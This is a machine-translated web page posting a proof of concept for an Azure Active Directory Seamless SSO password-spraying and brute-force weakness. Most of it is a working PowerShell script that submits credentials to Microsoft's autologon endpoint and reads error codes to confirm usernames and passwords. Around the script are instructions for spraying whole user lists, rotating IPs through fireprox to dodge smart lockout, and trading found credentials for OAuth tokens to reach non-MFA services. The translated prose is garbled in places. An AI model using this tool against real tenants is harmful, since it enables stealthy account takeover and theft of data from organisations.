POC about secureworks' recent azure Active Directory password brute force vulnerability

SecureWorks Current Azure Active Directory Password brute force crack vulnerability POC

describe

This code is Secureworks Recently disclosed Azure Active Directory Proof of concept of password brute force cracking vulnerability

Theoretically , This method will allow one or more AAD The account performs a brute force or password injection attack , It will not cause the account to lock or generate log data , This makes the attack invisible .

utilize

The basic usage is simple ：

Code spray

.\aad-sso-enum-brute-spray.ps1 USERNAME PASSWORD

Calling the code in this way will allow you to get the results for the specified user name and password .

By using foreach, You can easily use it for password injection ：

foreach($line in Get-Content .\all-m365-users.txt) {.\aad-sso-enum-brute-spray.ps1 $line Passw0rd! |Out-File -FilePath .\spray-results.txt -Append }

Please note that , If you want to Linux Use this method in , You need to transfer the generated file from UTF-16 Convert to UTF-8：

iconv -f UTF16 -t UTF-8 spray-results.txt >new-spray-results.txt

User enumeration

If you are only interested in enumerations , Just run in the above way to perform password injection . whatever “ Wrong password ” The return value of , or “ No users ” Any value other than , It means that you have found a valid user name .

User name return “True” Indicates that the password provided is valid .

return “ lock ” It may mean that the account is locked , Or smart lock temporarily prevents you from interacting with your account .

sheer animal strength

To use code for brute force cracking , Just iterate over the password field instead of the username field ：

foreach($line in Get-Content .\passwords.txt) {.\aad-sso-enum-brute-spray.ps1 [email protected] $line |Out-File -FilePath .\brute-results.txt -Append }

Found a valid user name / What to do after the password is right

If you find one or more valid user names / Password pairs , You can modify this code to get the returned DesktopSSOToken. You can then use this method to DesktopSSOToken In exchange for OAuth2 The access token .

then ,OAuth2 Access tokens can be associated with a variety of Azure、M365 and O365 API Use endpoints together .

however , At this point you may be MFA tripping . The best way is to take advantage of non - MFA visit , for example Outlook Web Access or ActiveSync.

Important tips

If you are from the same IP Address too fast to access API Endpoint ,Microsoft The smart lock feature of will start falsely claiming that the account is locked . To solve this problem , I strongly recommend using ustayready Of fireprox To avoid this problem . Just change $url Variable ：

$url="https://xxxxxxx.execute-api.us-east-1.amazonaws.com/fireprox/"+$requestid

however , If you try to brutally crack the password of a specific account , This will not bypass Smart Lockout.

aad-sso-enum-brute-spray.ps1

                $requestId = (New-Guid).ToString()

                $user = $Args[0]
$domain = $user.Split("@")[1]
                $password = $Args[1]

                $now = Get-Date
                $created = $now.toUniversalTime().toString("o")
                $expires = $now.addMinutes(10).toUniversalTime().toString("o")

               $url = "https://autologon.microsoftazuread-sso.com/$domain/winauth/trust/2005/usernamemixed?client-request-id=$requestid"
              
                [email protected]"
<?xml version='1.0' encoding='UTF-8'?>
<s:Envelope xmlns:s='http://www.w3.org/2003/05/soap-envelope' xmlns:wsse='http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd' xmlns:saml='urn:oasis:names:tc:SAML:1.0:assertion' xmlns:wsp='http://schemas.xmlsoap.org/ws/2004/09/policy' xmlns:wsu='http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd' xmlns:wsa='http://www.w3.org/2005/08/addressing' xmlns:wssc='http://schemas.xmlsoap.org/ws/2005/02/sc' xmlns:wst='http://schemas.xmlsoap.org/ws/2005/02/trust' xmlns:ic='http://schemas.xmlsoap.org/ws/2005/05/identity'>
    <s:Header>
        <wsa:Action s:mustUnderstand='1'>http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue</wsa:Action>
        <wsa:To s:mustUnderstand='1'>$url</wsa:To>
        <wsa:MessageID>urn:uuid:$((New-Guid).ToString())</wsa:MessageID>
        <wsse:Security s:mustUnderstand="1">
            <wsu:Timestamp wsu:Id="_0">
                <wsu:Created>$created</wsu:Created>
                <wsu:Expires>$expires</wsu:Expires>
            </wsu:Timestamp>
            <wsse:UsernameToken wsu:Id="uuid-$((New-Guid).toString())">
                <wsse:Username>$User</wsse:Username>
                <wsse:Password>$Password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </s:Header>
    <s:Body>
        <wst:RequestSecurityToken Id='RST0'>
            <wst:RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</wst:RequestType>
                <wsp:AppliesTo>
                    <wsa:EndpointReference>
                        <wsa:Address>urn:federation:MicrosoftOnline</wsa:Address>
                    </wsa:EndpointReference>
                </wsp:AppliesTo>
                <wst:KeyType>http://schemas.xmlsoap.org/ws/2005/05/identity/NoProofKey</wst:KeyType>
        </wst:RequestSecurityToken>
    </s:Body>
</s:Envelope>
"@
                $exists = $false

                try
                {
                    $response = Invoke-RestMethod -UseBasicParsing -Uri $url -Method Post -Body $body -ErrorAction SilentlyContinue
                    $exists = $true # Very bad password
                }
                catch
                {
                    $stream = $_.Exception.Response.GetResponseStream()
                    $responseBytes = New-Object byte[] $stream.Length

                    $stream.Position = 0
                    $stream.Read($responseBytes,0,$stream.Length) | Out-Null
            
                    $responseXml = [xml][text.encoding]::UTF8.GetString($responseBytes)

                    $errorDetails = $responseXml.Envelope.Body.Fault.Detail.error.internalerror.text
                }

            # Parse the error code. Only AADSTS50034 would need to be checked but good to know other errors too.
            if(!$exists -and $errorDetails)
            {
                if($errorDetails.startsWith("AADSTS50053")) # The account is locked, you've tried to sign in too many times with an incorrect user ID or password.
                {
                    $exists = "locked"
                }
                elseif($errorDetails.StartsWith("AADSTS50126")) # Error validating credentials due to invalid username or password.
                {
                    $exists = "bad password"
                }
                elseif($errorDetails.StartsWith("AADSTS50056")) 
                {
                    $exists = "exists w/no password"
                }
                elseif($errorDetails.StartsWith("AADSTS50014")) 
                {
                    $exists = "exists, but max passthru auth time exceeded"
                }
                elseif($errorDetails.StartsWith("AADSTS50076")) # Due to a configuration change made by your administrator, or because you moved to a new location, you must use multi-factor authentication to access '{resource}'
                {
                    $exists = "need mfa"
                }
                elseif($errorDetails.StartsWith("AADSTS700016")) # Application with identifier '{appIdentifier}' was not found in the directory '{tenantName}'. This can happen if the application has not been installed by the administrator of the tenant or consented to by any user in the tenant. You may have sent your authentication request to the wrong tenant.
                {
                    $exists = "no app"
                }
                elseif($errorDetails.StartsWith("AADSTS50034")) # The user account {identifier} does not exist in the {tenant} directory. To sign into this application, the account must be added to the directory.
                {
                    $exists = "no user"
                }
                else
                {
                    Remove-Variable exists
                }
            }

        return $user+"		"+$exists
        return $errorDetails